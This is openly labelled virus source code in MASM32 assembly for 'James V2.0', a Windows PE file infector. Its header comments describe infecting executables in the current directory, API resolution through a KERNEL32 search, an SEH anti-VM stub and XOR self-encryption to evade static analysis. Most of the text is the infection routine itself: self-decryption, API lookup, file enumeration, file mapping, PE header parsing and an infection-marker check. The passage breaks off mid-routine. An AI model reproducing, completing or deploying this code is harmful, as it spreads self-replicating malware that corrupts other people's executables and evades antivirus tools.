;====================NOTICE!This is a virus source!please take care of it==================================================
;virus name: James V2.0(last builded in 2003-8-25)
;function: infect the PE files in the current directory. But it's not complete: sometimes it works, sometimes it's a
; trouble-maker. So please be careful!
;Compiler: MASM32
;Debugged: Under windows2000/XP
;Author: james joo (zhu zhe)
;e-mail: warmwaters@21cn.com
; (c)Copyright reserved
; NEWTECH Studio
; http://kobesworld.yeah.net
;for NorthWest Polytechnical University,my parents,my girlfriend...
; Hope you enjoy it!Just for fun!
;Although the technique of this virus is so-so, it's my favorite, because I created it myself. So don't change anything if you want
;to copy it!
;Norton AV will scan this virus,it would tell the virus is:Bloodhound.w32.1
;KV2003 cant scan this virus!
;Other AV???dont know!!!!!!!!!!!!!
;ml /c /Zi james.asm
;link /subsystem:windows /machine:IX86 /section:.text,RWE james.obj
;2.0新增功能:
;1、将取API的代码放到病毒本体中,这样感染后的文件可以在别的平台下继续感染,以前感染后的文件要想继续正常感染必须是在同一OS下。
; 暴力搜索KERNEL32.DLL的代码是引用LUOCONG大侠的。
;2、使用Mapping来感染,以前是在文件上操作。
;3、使用了SEH。现在还没什么用,以后会利用SEH来ANTI-VM的。
;4、使用了简单的xor来加密代码,防止静态分析。
;
;==========================================================================================================================
.386
.model flat,stdcall
option casemap:none
include e:\masm32\include\windows.inc;my masm32's path,you can change it to yours
include e:\masm32\include\kernel32.inc
include e:\masm32\include\comctl32.inc
include e:\masm32\include\user32.inc
include e:\masm32\include\gdi32.inc
include e:\masm32\include\comdlg32.inc
includelib e:\masm32\lib\gdi32.lib
includelib e:\masm32\lib\kernel32.lib
includelib e:\masm32\lib\comctl32.lib
includelib e:\masm32\lib\user32.lib
includelib e:\masm32\lib\comdlg32.lib
GetKernelBase proto :DWORD
GetApiAddress proto :DWORD, :DWORD
.data
mcaption db "Hello!This Programe just show the usage of the API:MessageBox",0
mtitle db "Title",0
.code
host_start:
invoke MessageBoxA,NULL,offset mcaption,offset mtitle,MB_OK
;--------------------------------------
;ok,Action!
;----------------------------------------
vstart:
;push ebp
;push esp
xor ebx,ebx
mov ebx,[esp]
call nstart
nstart:
pop ebp
sub ebp,offset nstart;classical way to get the address of the virus-self!
;---------------------------------------
;save the Entrypoint!!!!!!!!!!!!!!!!!!!
;---------------------------------------
cmp now[ebp],0
jnz gonext
mov Old_ImageBase[ebp],0h
lea eax,vend[ebp]
mov Old_AddressOfEntryPoint[ebp],eax
gonext:
moveax,Old_ImageBase[ebp]
push eax
moveax,Old_AddressOfEntryPoint[ebp]
push eax
;;;;;;;;;;;;;;;;;anti-vm;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ASSUME FS:NOTHING
lea eax,SEH1[ebp]
push eax
push fs:[0]
mov fs:[0],esp
mov esi,0
mov eax,[esi];make a error for SEH
ExecuteHere:
pop fs:[0] ;清除seh链表
add esp,4
;;;;;;;;;;;;;;;anti-vmEND;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
cmp now[ebp],0
jz EncryptStart
lea edi , EncryptStart[ebp]
mov ecx , EncryptEnd - EncryptStart
DecryptLoop:
xor byte ptr [edi] , 27h
inc edi
loop DecryptLoop
EncryptStart:
;;;;;;;;;;;;;;;;;;;ok,GetApI
;获得 Kernel32.dll 的基地址:
push ebx
call GetKernelBase
mov Kernel32Base[ebp], eax
;获得 Kernel32.dll 中的所需的 Api 的线性地址
lea eax,szExitProcess[ebp]
push eax
push Kernel32Base[ebp]
call GetApiAddress
mov ExitProcess_addr[ebp], eax
lea eax,szLoadLibraryA[ebp]
push eax
push Kernel32Base[ebp]
call GetApiAddress
mov LoadLibraryA_addr[ebp], eax
lea eax,szGetProcAddress[ebp]
push eax
push Kernel32Base[ebp]
call GetApiAddress
mov GetProcAddress_addr[ebp], eax
;载入 User32.dll :
lea eax,szDllName[ebp]
push eax
call [ebp + LoadLibraryA_addr]
;获得 User32.dll 中的 MessageBoxA 的线性地址:
lea ebx,szMessageBoxA[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov MessageBox_addr[ebp], eax;Messagebox
;载入 Kernel32.dll :
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
;获得 KERNEL32.dll 中的API
lea ebx,szCreateFile[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov CreateFile_addr[ebp], eax;Createfile
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
lea ebx,szReadFile[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov ReadFile_addr[ebp], eax;readfile
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
lea ebx,szWriteFile[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov WriteFile_addr[ebp], eax;writefile
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
lea ebx,szGetCurrentDirectory[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov GetCurrentDirectory_addr[ebp], eax;GetCurrentDirectory
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
lea ebx,szGetSystemTime[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov GetSystemTime_addr[ebp], eax;GetSystemTime
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
lea ebx,szSetFilePointer[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov SetFilePointer_addr[ebp], eax;SetFilePointer
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
lea ebx,szFindFirstFile[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov FindFirstFile_addr[ebp], eax;FindFirstFile
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
lea ebx,szFindNextFile[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov FindNextFile_addr[ebp], eax;FindNextFile
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
lea ebx,szFindClose[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov FindClose_addr[ebp], eax;FindClose
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
lea ebx,szCloseHandle[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov CloseHandle_addr[ebp], eax;CloseHandle
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
lea ebx,szVirtualAlloc[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov VirtualAlloc_addr[ebp], eax;VirtualAlloc
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
lea ebx,szCreateFileMapping[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov CreateFileMapping_addr[ebp], eax;CreateFileMapping
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
lea ebx,szMapViewOfFile[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov MapViewOfFile_addr[ebp], eax;MapViewOfFile
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
lea ebx,szUnmapViewOfFile[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov UnmapViewOfFile_addr[ebp], eax;UnmapViewOfFile
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
lea ebx,szGetFileSize[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov GetFileSize_addr[ebp], eax;GetFileSize
lea eax,szDllName2[ebp]
push eax
call [ebp + LoadLibraryA_addr]
lea ebx,szVirtualFree[ebp]
push ebx
push eax
call [ebp + GetProcAddress_addr]
mov VirtualFree_addr[ebp], eax;VirtualFree
;;;;;;;;;;;;;;;;;;;GetApiEnd
;-----------------------------
;get currentdirectory
;-------------------------------
lea eax,NowPath[ebp]
push eax
mov eax,256
push eax
call GetCurrentDirectory_addr[ebp];the address is getten later!
;------------------------------------------------
;Find first PE file in this directory to infect
;------------------------------------------------
GFindFt:
lea eax,FindData[ebp]
push eax
lea eax,FileFilter[ebp]
push eax
call FindFirstFile_addr[ebp]
cmp eax,0
jz FindEnds
mov hFind[ebp],eax
;-----------------------------------------------------
;Let's open this PEfile to analysis
;-----------------------------------------------------
GoOnFind:
infect:
;;;;;;;;;;;;;create
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push FILE_SHARE_READ or FILE_SHARE_WRITE
push GENERIC_READ or GENERIC_WRITE
lea eax,FindData[ebp].cFileName
push eax
call CreateFile_addr[ebp]
cmp eax,INVALID_HANDLE_value
jz createfail
mov hFile[ebp],eax
push 0;;;;;;;;;;;;;;;保存文件大小
push eax
call GetFileSize_addr[ebp]
cmp eax,0
jz createfail
mov filesize[ebp],eax
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;createmapping
push 0
push 0
push 0
push PAGE_READWRITE
push 0
mov eax,hFile[ebp]
push eax
call CreateFileMapping_addr[ebp]
cmp eax,0
jz createMapfail
mov hMap[ebp],eax
;;;;;;;;;;;;;;Mapviewoffile
push 0
push 0
push 0
push FILE_MAP_ALL_ACCESS
mov eax,hMap[ebp]
push eax
call MapViewOfFile_addr[ebp]
cmp eax,0
jz Mappingfail
mov pMem[ebp],eax
;;;;;;;;;;;;;;;ok,go on
mov edi, eax
assume edi:ptr IMAGE_DOS_HEADER
cmp [edi].e_magic,IMAGE_DOS_SIGNATURE
jnz Notinfect
add edi, [edi].e_lfanew
assume edi:ptr IMAGE_NT_HEADERS
cmp [edi].Signature,IMAGE_NT_SIGNATURE
jnz Notinfect
movzx eax,[edi].FileHeader.NumberOfSections
dec eax
mov ecx,sizeof IMAGE_SECTION_HEADER;28h
mul ecx
push edi
pop esi
assume esi:ptr IMAGE_NT_HEADERS
add edi,sizeof IMAGE_NT_HEADERS
add edi,eax
assume edi:ptr IMAGE_SECTION_HEADER
cmp [edi].NumberOfRelocations,02704h;;;;;;;;;;;感染标志
jz Notinfect
add edi,sizeof IMAGE_SECTION_HEADER;;;;;;;;;;;;;继续判断是否还有添加新节的空间,新节开始的内存地质,edi为新节开始
movzx ebx,[esi].FileHeader.NumberOfSections
inc ebx
mov eax,sizeof IMAGE_SECTION_HEADER
mul ebx
mov ebx,pMem[ebp]
assume ebx:ptr IMAGE_DOS_HEADER
mov ecx,[ebx].e_lfanew
add ecx,sizeof IMAGE_NT_HEADERS
add ecx,eax